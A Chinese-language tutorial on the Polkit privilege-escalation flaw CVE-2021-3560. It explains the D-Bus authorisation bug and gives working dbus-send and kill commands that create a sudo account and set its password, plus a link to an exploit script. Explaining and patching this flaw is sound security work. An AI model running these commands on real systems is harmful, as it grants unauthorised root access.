一、Polkit简介

Polkit是默认安装在很多Linux发行版上的系统服务，它由systemd使用，因此任何使用systemd的Linux发行版也使用Polkit。

CVE-2021-3560漏洞存在于系统服务Polkit中，同时因为Polkit被Systemd所调用，因此所有默认安装了systemd的Linux发行版都会使用Polkit。

该漏洞的成因是执行dbus-send命令后在认证完成前强制终止引发错误。而Polkit未正确处理错误而导致允许无特权的用户添加一个sudo用户进行权限提升。

下表展示的是一些流行的Linux发行版以及是否包含此漏洞的情况：

二、Polkit架构

为了帮助解释该漏洞，首先对dbus-send命令执行过程进行说明。

虚线上方的两个进程dbus-send和Authentication Agent是非特权用户进程。线下的那些是特权系统进程。中间是dbus-daemon，它处理所有的通信：其他四个进程通过发送 D-Bus 消息相互通信。下面是通过dbus-send创建新用户的事件顺序：

1、dbus-send要求accounts-daemon创建一个新用户。
2、accounts-daemon从 接收 D-Bus 消息dbus-send。该消息包括发送者的  唯一总线名称。让我们假设它是:"1.96"。此名称附加到消息中，dbus-daemon不能伪造。
3、accounts-daemon 询问 polkit 连接：1.96 是否被授权创建新用户。
4、polkit 要求dbus-daemon提供连接的 UID：1.96。
5、如果连接 :1.96 的 UID 为 "0"，则 polkit 立即授权该请求。否则，它会向身份验证代理发送允许授权请求的管理员用户列表。
6、身份验证代理打开一个对话框以从用户那里获取密码。
7、身份验证代理将密码发送给 polkit。
8、polkit 将"是"回复发送回accounts-daemon.
9、accounts-daemon 创建新的用户帐户。

CVE-2021-3560漏洞位于上述事件序列的第四步。如果 polkit 向dbus-daemon请求总线:1.96 的 UID，但总线:1.96 不再存在，会发生什么？dbus-daemon正确处理这种情况并返回错误。但事实上 polkit 没有正确处理该错误，它没有拒绝请求，而是将请求视为来自 UID 0 的进程。换句话说，它立即授权请求。向dbus-demon请求总线UID的函数为polkit_system_bus_name_get_creds_sync。

三、漏洞利用过程

手工复现

操作系统：Ubuntu 20.04
镜像下载地址：点击下载

该漏洞非常容易利用，它所需要的是仅使用标准工具，如在终端中的几个命令bash，kill和dbus-send。
证明漏洞取决于安装的两个软件包：accountsservice和gnome-control-center 在 Ubuntu 桌面等图形系统上，这两个软件包通常默认安装。但是，如果您使用的是非图形 RHEL 服务器之类的东西，那么您可能需要安装它们，如下所示：

sudo yum install accountsservice gnome-control-center

当然，该漏洞与accountsservice或gnome-control-center没有任何特别关系。它们只是 polkit 客户端，恰好是利用的方便载体。PoC 依赖gnome-control-center和accountsservice。

为了避免重复触发身份验证对话框（这可能很烦人），我建议从 SSH 会话运行命令：
ssh localhost

本地测试环境

该漏洞是通过启动dbus-send命令但在 polkit 仍在处理请求的过程中将其杀死而触发的。为了确定杀死dbus-send进程的时间，首先我们要测量dbus-send正常运行的时间：

time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:hack string:"hack your host" int32:1

可以看到大约在0.005s，所以就意味着我需要dbus-send在大约0.005s秒前终止命令。

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:hack string:"hack your host" int32:1 & sleep 0.003s ; kill $!

这里可以多重复几次，就是为了可以写入成功！刷新几次之后 输入 id+用户 添加了一个名为hack的sudo用户。

id的值为1004，将下面的payload参数进行修改

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1004   org.freedesktop.Accounts.User.SetPassword string: 密码位 string:GoldenEye int32:1 & sleep 0.003s ; kill $!

在这之前需要使用openssl passwd -5 qwerasdf! 生成一个SSL密文(-5 指定sha256算法生成散列值)。

将该密文放在下面这段命令中的密码位里面

这里要反复刷几次，然后输入 su - hack

输入sudo su ->hack用户密码

漏洞利用成功！！！

Exp脚本测试

下载地址：https://github.com/Almorabea/Polkit-exploit

四、结论

CVE-2021-3560 使无特权的本地攻击者能够获得 root 权限。它非常简单且易于利用，因此应该尽快更新 Linux 。任何安装了 polkit 0.113 版（或更高版本）的系统都容易受到攻击。这包括流行的发行版，例如 RHEL 8 和 Ubuntu 20.04。